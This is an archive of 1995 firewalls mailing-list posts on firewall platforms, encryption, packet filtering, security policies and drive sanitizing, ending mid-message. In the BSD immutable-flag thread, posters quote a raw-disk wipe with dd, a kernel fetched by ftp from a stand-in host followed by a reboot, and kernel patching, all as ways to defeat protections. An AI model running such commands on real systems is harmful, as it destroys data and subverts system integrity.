How does that help you build a better firewall? It gives you >a trusted host on which to build your firewall application/relay/circuit. >A broken firewall is a terrible liability, there goes all of that >virtual private network encryption! .. there goes all of your >companies data! ..what a nice place to sit and watch whatever your >company accesses over the net! As several have pointed out: who cares if the firewall is safe if the internal network is not. Firewalls are *NOT* general purpose computing engines. Padgett has suggested building firewalls out of 386SXs: one for each proxy service! The compartments sound very nice when you have users that could potentially do things. Firewalls do not. They have network connections and must protect themselves from attack. Find a commercial firewall that has either rlogind or telnetd running anywhere! Meanwhile, we have customers struggling to define a sane security policy, complaining that "talk" doesn't work (needs UDP), asking "why do I need an internal DNS?", "where do dial in modems go?" B1-certified is over engineered for the task. The only nice thing is the comprehensive auditing available, but most customers are not willing to dedicate some kind of write-once media to keep good, solid logs anyway. >Even if the firewall functions perfectly, you may have >security problems because you perfectly pass some insecure protocol >thru the firewall. So, you need B1 internally as well to be perfect. -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Wed Aug 9 17:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27568 for firewalls-outgoing; Wed, 9 Aug 1995 17:04:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27543 for ; Wed, 9 Aug 1995 17:04:32 -0700 Received: from nsco.network.com(129.191.1.1) by miles via smap (V1.3) id sma027497; Wed Aug 9 17:03:40 1995 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA10006; Wed, 9 Aug 95 19:21:52 CDT Received: by mnbp.network.com with Microsoft Mail id <30294C68@mnbp.network.com>; Wed, 09 Aug 95 19:01:44 CDT From: Greg Brennan To: firewalls mailing list Subject: FW: Encripted ftp connections Date: Wed, 09 Aug 95 19:00:00 CDT Message-Id: <30294C68@mnbp.network.com> Encoding: 66 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Lyndon asked: >I have been tasked with setting up an ftp server to >communicate with a handfull of business partners.... >... Due to the >nature of the data the data must be encripted as it passes >over the Internet and stong authentication must be used >when they connect. > >This is a commercial project and the data will cross >International bounderies, for this reason I do not want >to use encription technology such as pgp as some of the >countries will have problems with this. > >I see two solutions, to encript the data, a hardware >encription device is placed at each remote site so that >the data is encripted between the remote and local machine >or mandate in the security policy that the data is encripted >before it is transmitted. In either case the stong >authentication could be done with one time hand held >authentication devices. > >Questions: > >Does anyone know of a hardware solution that can operate >between one local machine and 5 or 6 remote machines? > > >If encription of the data before transmission is mandated >what commercial encription can be used that will be >acceptable across International boarders and can anyone >think of a method where if someone forgot to encript the >data before transmission this would be caught and the >transfer stopped? The Security Router from network systems will allow this: Data Privacy Facility (DPF) is NSCs Cryptographic offering. One of the encryption algorithms it supports is NSC1, which is exportable. (DES, Triple DES, and IDEA are also available but may not be exportable. DPF will also provide strong authentication between sites (ala RSA and Diffie Hellman). The second package is NSCs packet filtering software - Packet Control Facility (or PCF). Since PCF is capable of sorting data into various classes (based on address, application etc.) it has the capability to ensure that all data leaving your FTP server that is destined for the other sites will be encypted. Other data, or data destined for other locations on the internet that doesn't have to be encypted will go as usual. More information is available on these and other network security tools on Network Systems' home page at http:/www.network.com Sincerely, Greg Brennan ________________________________ Greg Brennan | Network Systems Corp. (Canadian Office) Manager, Business Partner Solutions | 5710 Timberlea Blvd., Suite 207 Internet: greg.brennan@network.com | Mississauga, Ontario L4W 4W1 Voice: (905) 629-0440 | "Secure Networks-On-Demand"TM Fax: (905) 629-0435 | http://www.network.com From firewalls-owner Wed Aug 9 17:59:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28875 for firewalls-outgoing; Wed, 9 Aug 1995 17:25:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28810 for ; Wed, 9 Aug 1995 17:24:55 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma028775; Wed Aug 9 17:23:59 1995 Received: from vodka.sse.att.com by ig1.att.att.com id AA00776; Wed, 9 Aug 95 17:26:14 EDT Message-Id: <9508092126.AA00776@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: steveg@cseic.saic.com (Stephen Harold Goldstein) Date: Wed, 9 Aug 1995 17:27:59 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9508091811.AA19205@cseic.saic.com> from "Stephen Harold Goldstein" at Aug 9, 95 02:11:51 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve, > Steve Gaarder writes: > > My vote (with 1 reservation - see below) would be for BSD for at least two > reasons: > > 1) Its chflags command which can set files as append-only (sappnd) or > "immutable" (schg). With these additional features prudently > applied to critical files, even if root were compromised, the intruder > would be unable to (a) erase any logs that tracked his actions (b) > replace things like /bin/login with a hacked version, etc. ... > > As for (1), in theory these flags can only be changed when the box is > in single user mode, but the man page for chflags seems to imply there > may be another way: > > "If either or both of sappnd or schg is set, however, not even the > super-user can change the flags unless the system is in ``insecure'' mode > (typically, single user). The user flags can be set by the owner or the > super-user; the system flags can only be set by the super-user." > > Anyone know of a way an intruder might induce "insecure" mode while in > multi-user mode? > I don't know how BSD implements the sappnd or schg features for files. But if it involves permission bits or other data in the inode of the file, then it may be possilbe for a root user to change the inode's contents by seeking to the appropriate spot on the block or raw device and updating the inode. That's may sound hard to do, but it's not. Alternatively, root can patch /unix or the running system image to ignore the bits where ever they may be stored. Basically just replace part of the code in the function that does the check with an early return or jump or register set. Any BSD guru's out there? Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Wed Aug 9 18:51:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01831 for firewalls-outgoing; Wed, 9 Aug 1995 18:23:42 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01754 for ; Wed, 9 Aug 1995 18:23:32 -0700 Received: from citecuh.citec.qld.gov.au(203.5.10.10) by miles via smap (V1.3) id sma001727; Wed Aug 9 18:22:33 1995 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id LAA00508; Thu, 10 Aug 1995 11:17:14 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma000501; Thu Aug 10 11:16:57 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA11552; Thu, 10 Aug 1995 11:22:00 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9508100122.AA11552@citecub.citec.qld.gov.au> Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: mcr@milkyway.com (Michael Richardson) Date: Thu, 10 Aug 95 11:21:56 EST Cc: firewalls@GreatCircle.COM In-Reply-To: <40bg22$21s@metis.milkyway.com>; from "Michael Richardson" at Aug 9, 95 7:23 pm X-Mailer: ELM [version 2.3 PL11] content-length: 796 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > In article <9508091811.AA19205@cseic.saic.com>, > Stephen Harold Goldstein wrote: > > 1) Its chflags command which can set files as append-only (sappnd) or > > "immutable" (schg). With these additional features prudently > > applied to critical files, even if root were compromised, the intruder > > would be unable to (a) erase any logs that tracked his actions (b) > > replace things like /bin/login with a hacked version, etc. > > Uh... dd if=/dev/zero of=/dev/rwd0a Feel free to correct me if I am wrong, but I recall reading that in run state 2 I believe the raw disks to not be writable. > Or... ftp foo.bar > cd / > get bsd > quit > reboot If /bsd is marked immutable, then not even root can overwrite it. Colin From firewalls-owner Wed Aug 9 19:03:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02319 for firewalls-outgoing; Wed, 9 Aug 1995 18:38:44 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02303 for ; Wed, 9 Aug 1995 18:38:42 -0700 Received: from ns.gbnet.net(194.70.126.10) by miles via smap (V1.3) id sma002298; Wed Aug 9 18:38:21 1995 Received: (from jrg@localhost) by ns.gbnet.net (8.7.Beta.10/8.6.12) id CAA15568; Thu, 10 Aug 1995 02:36:46 +0100 (BST) Date: Thu, 10 Aug 1995 02:36:46 +0100 (BST) From: James R Grinter Message-Id: <199508100136.CAA15568@ns.gbnet.net> X-Subliminal: H is for Hypertext X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: mcr@milkyway.com (Michael Richardson), firewalls@GreatCircle.COM Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu 10 Aug, 1995, mcr@milkyway.com (Michael Richardson) wrote: > Uh... dd if=/dev/zero of=/dev/rwd0a As I recall, in BSD security level 2, you can't raw read/write the devices. > Or... ftp foo.bar > cd / > get bsd make the kernel file immutable. You should notice if your machine rebooted and you didn't ask it to. > Only pid=1 can change the security mode, and stock /sbin/init >only does that in "single user mode" yup. Not sure what you do to stop someone patching the incore memory. Does it stop you editing that too? Probably... James. From firewalls-owner Wed Aug 9 19:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02564 for firewalls-outgoing; Wed, 9 Aug 1995 18:52:45 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02548 for ; Wed, 9 Aug 1995 18:52:42 -0700 Received: from sam.comms.unsw.edu.au(149.171.96.20) by miles via smap (V1.3) id sma002533; Wed Aug 9 18:51:59 1995 Received: from atlas.turbosoft.com.au (atlas.turbosoft.com.au [203.10.16.38]) by sam.comms.unsw.EDU.AU (8.6.9/8.6.9.kenso-central) with SMTP id LAA24157; Thu, 10 Aug 1995 11:42:30 +1000 Received: from by atlas.turbosoft.com.au (4.1/TS-0.7) id AB11222; Thu, 10 Aug 95 12:04:46 EST Message-Id: <9508100204.AB11222@atlas.turbosoft.com.au> Comments: Authenticated sender is From: "Paul Brooks" Organization: TurboSoft Pty. Ltd. To: millar@pobox.upenn.edu, firewalls@greatcircle.com Date: Thu, 10 Aug 1995 11:47:50 +1000 Subject: Re: Host protection with ipfilterd? Reply-To: paul@turbosoft.com.au Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Someone has asked me if it is appropriate to use ipfilterd to filter access >to their SGI host residing on a campus subnet. My take on it is that >ipfilterd is appropriate if you want to dedicate your SGI as a router to >filter packets between an internal subnet and an external network/subnet, >but that it is not the right tool for protecting the SGI host *itself*. >Seems to me like tcp wrappers and portmapper are the proper tools for >host-based filtering I use ipfilterd here to protect the gateway host, because unlike screend it can have rules specified on particular ports - so it can protect against source address spoofing, which screend cannot. Effectively, this allows you to draw the 'firewall boundary line' at the incoming interface, with the gateway host 'inside' the line. Tcp-wrappers etc should be used as well - relying on a single layer is silly. Another reason is I couldn't find the SunOS source to allow screend to be installed. ------- Paul Brooks (PB94) | paul@turbosoft.com.au | Ssshhh: Network Specialist | pwb@newt.phys.unsw.edu.au| We're hunting TurboSoft Pty Ltd | | wabbits (in 579 Harris St., Ultimo | Ph : +61 2 281 3155 | Centennial Park) ! Sydney Australia 2007 | Fax: +61 2 281 3350 | From firewalls-owner Wed Aug 9 21:31:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA08565 for firewalls-outgoing; Wed, 9 Aug 1995 21:19:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA08549 for ; Wed, 9 Aug 1995 21:19:45 -0700 Received: from citecuh.citec.qld.gov.au(203.5.10.10) by miles via smap (V1.3) id sma008540; Wed Aug 9 21:18:56 1995 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id OAA05805 for ; Thu, 10 Aug 1995 14:13:33 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma005795; Thu Aug 10 14:13:03 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA11344; Thu, 10 Aug 1995 14:18:05 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9508100418.AA11344@citecub.citec.qld.gov.au> Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: firewalls@GreatCircle.COM Date: Thu, 10 Aug 95 14:18:04 EST X-Mailer: ELM [version 2.3 PL11] content-length: 1238 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Perhaps I can put the BSD part of this thread to sleep, immutably :-). I quote from the BDS/OS book (page 90). ------------ Security levels BSD/OS V2.0 has a notion of a security level; see init(8). By default, the system goes to s `secure' mode when multi-user. In tha mode, /dev/kmem and /dev/mem cannot be written, raw disks cannot be written and immutable file cannot be written - even by the superuser. (See chflags(1) for information on flags including the immutable flags - which can only be changed in not-secure mode.) The modes are: -1 - 'Permanently Insecure' - 'Insecure' and even multi-user mode is 'insecure'. 0 - 'Insecure' - In single user mode, root can change flags and read/write any file - multi-user mode automatically moves to 'secure'. 1 - 'Secure' - can not write immutable files or raw devices or /dev/kmem 2 - highly secure - 'Secure' and disk devices are not writable through /dev - newfs and floppy writing disabled Disable automatic activation of these security features by recompiling the kernel with the 'INSECURE' flag set. You can still manually change security levels using sysctl(8). ------------ Thus endeth the lesson :-) Colin From firewalls-owner Wed Aug 9 23:30:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA10306 for firewalls-outgoing; Wed, 9 Aug 1995 23:27:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA10298 for ; Wed, 9 Aug 1995 23:27:51 -0700 Message-Id: <199508100627.XAA10298@miles.greatcircle.com> Received: from ibmmail.com(199.171.26.3) by miles via smap (V1.3) id sma010295; Wed Aug 9 23:26:50 1995 Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 7100; Wed, 09 Aug 95 23:43:08 EDT Date: Wed, 09 Aug 1995 23:46:35 EDT From: "George Janczuk JZKGEQ - AMPLN1" To: Stephen.M.Crane@jci.com Cc: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: RE: SECURITY Sender: firewalls-owner@GreatCircle.COM Precedence: bulk =========================================================================== Stephen, I have received quite a few responses to my request. I will summarise the responses and post them to the firewalls list once they stop flowing in. This will probably be next week sometime. Regards, George Janczuk. _________________________(Mail message history)_________________________ To: George Janczuk/AMP cc: From: I1509527 @ IBMMAIL @ MEMOGWY1 Date: 09/08/95 11:28:00 PM Subject: RE: SECURITY ************************************************************ ** ** ** The contents of this mail item have been changed by ** ** IBM mail exchange. Due to the length of the senders ** ** item some lines had to be wrapped to accommodate the ** ** format of this, or an interim system. Any lines that ** ** have been wrapped have been marked at their beginning ** ** with '...'. Wrapping occurred after character 079. ** ** ** ************************************************************ Date: Wed, 09 Aug 1995 08:11 -0600 (CST) From: Stephen.M.Crane@jci.com Subject: Re: Security To: auampdrv@ibmmail.com As an EDP auditor, I also keep an eye on this list and stay on the lookout for others. I would appreciate it if you could forward the addresses of any other useful security resources on the net as people respond. Thanks in advance, Stephen Crane ______________________________ Reply Separator ..._________________________________ Subject: Security Author: auampdrv@ibmmail.com at Mailhub Date: 8/8/95 7:52 PM =========================================================================== Our audit division is interested in gaining access to security based resources (ie: mailing lists). I will be recommending this list (firewalls), best-of-security and risks. I also seem to remember that another SECURITY based list does exist and has been mentioned here before - but I have not been able to find it. Does anyone know of this list? (it may possibly have been a newsgroup). What would other people recommend as an "online" reading list for audit personel? Regards, George Janczuk (auampdrv@ibmmail.com) AMP Society. ---- End of mail text Additional SMTP headers from original mail item follow: Received: from interlock.jci.com by ibmmail.COM (IBM VM SMTP V2R2) with TCP; Wed, 09 Aug 95 09:26:14 EDT Received: from mhub.corp.jci.com by interlock.jci.com with SMTP id AA12916 (InterLock SMTP Gateway 3.0 for ); Wed, 9 Aug 1995 08:26:24 -0500 Received: from core.corp.jci.com by mhub.corp.jci.com; Wed, 9 Aug 95 08:24:41 - 0500 Received: from ccMail.JCI.Com by CORE.Corp.JCI.Com (PMDF V4.3-13 #3982) id <01HTV2KA6YYO000DX5@CORE.Corp.JCI.Com>; Wed, 09 Aug 1995 08:26:30 -0600 (CST) Message-Id: <01HTV2KCITVM000DX5@CORE.Corp.JCI.Com> Mime-Version: 1.0 Content-Type: TEXT/PLAIN Content-Transfer-Encoding: 7BIT From firewalls-owner Thu Aug 10 03:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA14932 for firewalls-outgoing; Thu, 10 Aug 1995 03:25:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA14916 for ; Thu, 10 Aug 1995 03:25:30 -0700 Received: from ub4b.eunet.be(192.92.130.1) by miles via smap (V1.3) id sma014911; Thu Aug 10 03:25:10 1995 Received: from senbel.UUCP by ub4b.eunet.be (5.65c/ub4b_06) id AA06135; Thu, 10 Aug 1995 12:26:17 +0200 Received: from senat by senate.be (4.1/SMI-4.1) id AA07486; Thu, 10 Aug 95 12:23:43 +0200 Date: Thu, 10 Aug 95 12:23:44 +0200 From: ew@senate.be (Emmanuel Willems) Message-Id: <9508101023.AA05751@senat> To: firewalls@greatcircle.com Subject: Re: Sample Security Policy? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Cougar wrote: > give away a copy of an organisations Security Policy?!? Not only must > you be kidding, but also: fat chance. That'd be as negligent as giving > away company trade secrets! How's that? This looks a lot like security through obscurity to me! Emmanuel -- Emmanuel Willems e-mail: ew@senate.be From firewalls-owner Thu Aug 10 05:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16767 for firewalls-outgoing; Thu, 10 Aug 1995 05:19:39 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16751 for ; Thu, 10 Aug 1995 05:19:36 -0700 Received: from papin.hrz.uni-marburg.de(137.248.1.8) by miles via smap (V1.3) id sma016748; Thu Aug 10 05:19:22 1995 Received: from pcmbi60.Informatik.Humanmedizin.Uni-Marburg.DE by Mailer.Uni-Marburg.DE (AIX 3.2/UCB 5.64/20.07.94) id AA25532; Thu, 10 Aug 1995 14:18:03 +0200 Message-Id: <9508101218.AA25532@Mailer.Uni-Marburg.DE> From: "meyer" To: firewalls@greatcircle.com Date: Thu, 10 Aug 1995 14:27:46 +0000 Subject: screened subnet & cisco performance Reply-To: meyerd@Mailer.Uni-Marburg.DE Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I'm planning to connect our companynet to the internet via a screened subnet and a firewall using fwtk or something like that: internet -- cisco7000 -- screened subnet -- firewall machine I I our router (non cisco/non telnet) I I our net I'm not the manager of the cisco, but maybe he does what I want him to do. My Questions: 1. What kind of access-list do I need on the Cisco: incoming or outgoing IP-traffic only to the firewall or both? 2. The cisco uses a switch processor witch offers more speed than the routing processor. Does one of the access-list (incoming or outgoing) affect or disable this kind of fast switching, so that the throughput of the entire box is slowing down, not only the "screened subnet port"? 3. Would you take responsibility for the firewall, if you are not shure, that the cisco is locked in the best way? Or would you put another two-port-router that is under your management between the cisco and the screened subnet? Thanks Dirk ----------------------------------------------------------------- Dirk A. Meyer meyerd@mailer.uni-marburg.de Klinikum der Philipps-Universitaet Marburg Tel.xx49-6421-28-6291 Med. Informatik Fax.-------------8921 Bunsenstr. 3 D-35033 Marburg/Lahn ----------------------------------------------------------------- From firewalls-owner Thu Aug 10 05:49:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16768 for firewalls-outgoing; Thu, 10 Aug 1995 05:19:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16752 for ; Thu, 10 Aug 1995 05:19:36 -0700 Received: from papin.hrz.uni-marburg.de(137.248.1.8) by miles via smap (V1.3) id sma016747; Thu Aug 10 05:19:26 1995 Received: from pcmbi60.Informatik.Humanmedizin.Uni-Marburg.DE by Mailer.Uni-Marburg.DE (AIX 3.2/UCB 5.64/20.07.94) id AA25534; Thu, 10 Aug 1995 14:18:09 +0200 Message-Id: <9508101218.AA25534@Mailer.Uni-Marburg.DE> From: "meyer" To: firewalls@GreatCircle.COM Date: Thu, 10 Aug 1995 14:19:36 +0000 Subject: Screened subnet & Cisco Performance Reply-To: meyerd@Mailer.Uni-Marburg.DE Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I'm planning to connect our companynet to the internet via a screened subnet and a firewall using fwtk or something like that: internet -- cisco7000 -- screened subnet -- firewall machine I I our router (non cisco/non telnet) I I our net I'm not the manager of the cisco, but maybe he does what I want him to do. My Questions: 1. What kind of access-list do I need on the Cisco: incoming or outgoing IP-traffic only to the firewall or both? 2. The cisco uses a switch processor witch offers more speed than the routing processor. Does one of the access-list (incoming or outgoing) affect or disable this kind of fast switching, so that the throughput of the entire box is slowing down, not only the "screened subnet port"? 3. Would you take responsibility for the firewall, if you are not shure, that the cisco is locked in the best way? Or would you put another two-port-router that is under your management between the cisco and the screened subnet? Thanks Dirk ----------------------------------------------------------------- Dirk A. Meyer meyerd@mailer.uni-marburg.de Klinikum der Philipps-Universitaet Marburg Tel.xx49-6421-28-6291 Med. Informatik Fax.-------------8921 Bunsenstr. 3 D-35033 Marburg/Lahn ----------------------------------------------------------------- From firewalls-owner Thu Aug 10 06:05:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16736 for firewalls-outgoing; Thu, 10 Aug 1995 05:15:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16711 for ; Thu, 10 Aug 1995 05:15:36 -0700 Received: from cbisgate.cbis.com(155.90.248.205) by miles via smap (V1.3) id sma016705; Thu Aug 10 05:15:08 1995 Received: from notes (notes.cbis.com) by cbisgate.cbis.com (4.1/SMI-4.1) id AA02548; Thu, 10 Aug 95 08:13:57 EDT Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA4890; Thu, 10 Aug 95 08:15:23 -0700 Message-Id: <9508101515.AA4890@notes> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id EF9D2FFAB13ECC6D8525621400402960; Thu, 10 Aug 95 08:15:22 To: firewalls-digest From: Warren Moore Date: 10 Aug 95 8:10:51 EDT Subject: Re: Sample Security Policy? X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Cougar writes: >give away a copy of an organisations Security Policy?!? Not only must >you be kidding, but also: fat chance. That'd be as negligent as giving >away company trade secrets! I may have missed something here, and certainly not to start a war, but that's wrong. Copies of real, in-use, corporate security policies are available from many different sources--starting with the Computer Security Institute's old "Computer Security Handbook," and the MIS Training Institute's "Information Security Resource Manual." (IBM, First American National Bank, yadatayada). In some cases they're slightly sanitized, but the base document is there. And, there's really no reason not to provide samples (if management approves), simply because a true Corporate Security Policy statement isn't going to say very much anyway--it should be nothing more than a short statement of what your corporate entity's leaders expect. Perhaps it's splitting hairs, but many people don't understand (and often confuse) the base meanings of the words "Policy," "Standards," "Guidelines," and "Procedures." If you use the definitions below, there's no reason not to let people know your policy, but quite a few to guard your standards, guidelines, and procedures closely. Policy: A statement of *what* management expects; not how those expectations will be met. Standard(s): The criteria against which results are to be judged. Guideline(s): Items that *should* be considered when a particular subject is studied and analyzed. Guidelines are not always an exhaustive list, nor are they always applicable to all things in all cases. Procedure(s): A detailed step-by-step description of *how* a job is done, defining *who* does *what*. Procedures are written to support policy, meet standards, use guidelines when necessary, and *show the way to do something.* Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. My Opinions Are Mine Only -- Who Else Would Claim Them? From firewalls-owner Thu Aug 10 06:30:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17601 for firewalls-outgoing; Thu, 10 Aug 1995 05:56:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17577 for ; Thu, 10 Aug 1995 05:56:39 -0700 Received: from hhs-custos.dhhs.gov(158.70.252.2) by miles via smap (V1.3) id sma017572; Thu Aug 10 05:56:10 1995 Received: from inms-db.os.dhhs.gov. by hhs-custos.dhhs.gov (4.1/SMI-4.1) id AA05394; Thu, 10 Aug 95 09:08:25 EDT Received: by inms-db.os.dhhs.gov. (4.1/SMI-4.1) id AA01293; Thu, 10 Aug 95 08:50:02 EDT Date: Thu, 10 Aug 1995 08:50:02 -0400 (EDT) From: Alan Dowd To: John Cougar Cc: snd1pmf@snd10.med.navy.mil, firewalls@GreatCircle.com Subject: Re: Sample Security Policy? In-Reply-To: <199508092328.QAA23996@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 10 Aug 1995, John Cougar wrote: > Hey Pat > > give away a copy of an organisations Security Policy?!? Not only must > you be kidding, but also: fat chance. That'd be as negligent as giving > away company trade secrets! NOT! The security policy can be as simple as "all that is not specifically permitted is forbidden." It's not the policy, it's how you enforce it that _may_ need protection. Consider a policy for passwords: 1) all login accounts must have passwords 2) all passwords must be at least 6 characters 3) all passwords must contain at least a) 1 upper case alphabetic character b) 1 lower case alphabetic character c) 1 non-alphabetic character What advantage does this give a potential intruder? What advantage does it give the user? the administrator? (Rhetorical questions; solutions are left to the student.) Now if you reveal the enforcement mechanism and make the password file available for public scrutiny, then you _may_ be giving something away, but if all you reveal is the policy, you give away nothing. > > You can, however, get more than enough info. from the RFC 1244, available > at any number of archives. Try an archie server near you someplace. > Here are a few Web sites of interest: http://ciac.llnl.gov/cstc/CIACHome.html http://www.isse.gmu.edu:80/~gmuisi http://hightop.nrl.navy.mil http://csrc.ncsl.nist.gov The last one, the National Institute of Standards and Technology, has a separate topic for policies. It can also be reached by anonymous ftp. > You'll also want copies of the DoD Orange Book, ... to prop up the corner of a wobbly monitor. The Orange Book has absolutely nothing to say about writing policies - it's a set of evaluation criteria for trusted systems. For the record, it is available, for the asking (as is the whole Rainbow series), from: INFOSEC Awareness Division ATTN: X711/IOAC Ft. Geroge G. Meade, MD 20755-6000 USA +1 410 766 8729 (This latter information changes at unpredictable intervals. Security by obscurity at the NSA?) Electronic copies also exist in many on-line archives. Regards, Al Dowd Unix Network Security Analyst Management Systems Applications, Inc. From firewalls-owner Thu Aug 10 06:36:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17108 for firewalls-outgoing; Thu, 10 Aug 1995 05:44:41 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17086 for ; Thu, 10 Aug 1995 05:44:37 -0700 Received: from unknown(132.9.205.2) by miles via smap (V1.3) id sma017078; Thu Aug 10 05:44:16 1995 Received: from cs28-1.ellsworth.af.mil by ns.ellsworth.af.mil with SMTP (5.59/25-eef) id AA00714; Thu, 10 Aug 95 06:45:47 MDT Received: by cs28-1.ellsworth.af.mil with Microsoft Mail id <302A0BAA@cs28-1.ellsworth.af.mil>; Thu, 10 Aug 95 06:37:46 PDT From: "Tucker, R., SrA, 28CS/SCSNS" To: "'firewalls-owner'" Subject: Sanitizing SCSI Drives Date: Thu, 10 Aug 95 06:37:00 PDT Message-Id: <302A0BAA@cs28-1.ellsworth.af.mil> Encoding: 99 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ok folks, I guess it's time to fess up so I can take my foot out of my mouth now. :*) As far as sanitizing SCSI drives using Norton Utilities' Wipedisk. It *IS* still approved for TS, but on MS-DOS systems on ***MILITARY COMPUTERS ONLY.*** If you're a civilian contractor, there are different guidelines you have to follow, and they don't have provisions for clearing TS off of your systems. However, this has nothing to do with hardware and being able to pull information back up from the system, and everything to do with administrative procedures BEFORE you need to sanitize. The sloppy drive head positioning deals with floppy drives, and there is NO WAY, barring destruction, to declassify a floppy disk. However, HD's, unless the head slips (and you would know when it fails) can be declassified in this manner. This includes taking into consideration taking the platters apart, once overwritten enough times, the information is gone. (However, it's also been my past experience that sooner or later, someone will invent something that will nullify this statement, since whenever someone says, "It can't be done." there's always someone doing it.) I know this means there's a double standard between military and civilian requirements, but please don't flame me for it. :*) Part of the problem, is ISM and NISPOM are both Industrial Security program documents. While they DO APPLY, they do not necessarily apply as far as Computer Security is concerned... but you still have to follow them. This is what's known as bureaucracy and politics at work. Industrial Security is governed at the national level by former Security Police (SP) personnel, who haven't got a clue as to computer requirements. (I think it's a prerequisite for running ANY national level program, however, so I'm not trying to flame them.) Since they have no jurisdiction in computer requirements, the only changes they can make to national computer security mandates is to make them more stringent. (You can legally add to a requirement, but you can't make them less stringent without a waiver from the responsible office.) In short, if you're a civilian with classified on your computer, you have to abide by the NISPOM. Government and military personnel get to use the computer security guidelines. < Neah, neah, neah. :*P > Also, Wipedisk is only approved for MS-DOS systems, we have nothing approved for any other system for any level of classified, besides utilizing a 